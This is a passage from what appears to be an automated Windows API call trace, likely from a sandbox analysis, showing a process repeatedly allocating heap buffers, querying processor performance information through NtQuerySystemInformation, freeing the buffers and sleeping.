ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.475] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.476] Sleep (dwMilliseconds=0x110) [0221.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.486] Sleep (dwMilliseconds=0x110) [0221.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.503] Sleep (dwMilliseconds=0x110) [0221.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.520] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.521] Sleep (dwMilliseconds=0x110) [0221.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.536] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.537] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.537] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.537] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.537] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.538] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.538] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.538] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.538] Sleep (dwMilliseconds=0x110) [0221.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.551] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.552] Sleep (dwMilliseconds=0x110) [0221.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.568] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.568] Sleep (dwMilliseconds=0x110) [0221.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.583] Sleep (dwMilliseconds=0x110) [0221.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.598] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.599] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.599] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.600] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.600] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.600] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.601] Sleep (dwMilliseconds=0x110) [0221.606] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.606] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.610] Sleep (dwMilliseconds=0x110) [0221.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.630] Sleep (dwMilliseconds=0x110) [0221.637] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.638] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.640] Sleep (dwMilliseconds=0x110) [0221.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.654] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.660] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.662] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.662] Sleep (dwMilliseconds=0x110) [0221.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.675] Sleep (dwMilliseconds=0x110) [0221.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.688] 